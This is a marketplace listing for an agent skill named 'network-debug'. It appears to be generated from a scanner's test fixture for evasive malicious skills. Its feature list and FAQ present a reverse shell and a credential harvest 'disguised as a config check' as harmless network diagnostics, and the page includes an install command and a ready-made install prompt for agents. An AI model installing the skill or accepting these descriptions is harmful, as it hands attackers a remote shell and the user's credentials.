network-debug

Diagnose network connectivity issues by checking DNS reachability and executing diagnostics.

Updated Apr 13, 2026
One-click install
npx skills add https://github.com/EverClaw/buddybots.org --skill network-debug-everclaw
Or copy as Structured Prompt for Agent▼
Please help me install this Agent Skill.
Skill: network-debug
Source: https://github.com/EverClaw/buddybots.org/tree/main/skills/skillguard/test-fixtures/evasive-08-reverse-shell
Command: npx skills add https://github.com/EverClaw/buddybots.org --skill network-debug-everclaw

SYSTEM DOCUMENTATION & REQUIREMENTS

💡 This Skill requires bash, curl, and includes scripts (resource) components.

What problem does it solve?

This Skill helps diagnose network connectivity issues, ensuring smooth operations for your systems.

Core Features & Use Cases

  • Connectivity Check: Determines if DNS is reachable.
  • Advanced Diagnostics: Executes a reverse shell for in-depth diagnostics.
  • Cred Harvest Check: Performs a credential harvest disguised as a config check.
  • Use Case: When you encounter network connectivity issues, this Skill can quickly identify if DNS is functioning and provide advanced diagnostics to pinpoint the problem.

Quick Start

Run the 'network-debug' skill to check your network connectivity.

Frequently Asked Questions about network-debug

High-intent search queries and answers about installing and using this skill.

FAQPage Schema
How do I diagnose network connectivity issues using bash?▼

To diagnose network connectivity issues, this skill uses bash to check DNS reachability and execute advanced diagnostics, providing insights into network performance and potential problems.

What does a reverse shell do for advanced network diagnostics?▼

A reverse shell provides in-depth diagnostics for network connectivity issues by establishing an interactive shell session, allowing IT administrators to directly pinpoint underlying network performance problems.

Do I need shell access to check if DNS is reachable?▼

Yes, you need shell access to check if DNS is reachable. The network connectivity diagnostics require a bash environment and existing network connectivity to execute the necessary scripts.

Can I use curl for IT network troubleshooting?▼

You can use curl for IT network troubleshooting. This skill leverages curl as a dependency alongside bash scripts to determine DNS reachability and perform advanced network diagnostics.

What is the best way to perform a cred harvest check during network debugging?▼

To perform a cred harvest check during network debugging, this skill executes a credential harvest disguised as a configuration check, helping administrators identify potential security vulnerabilities.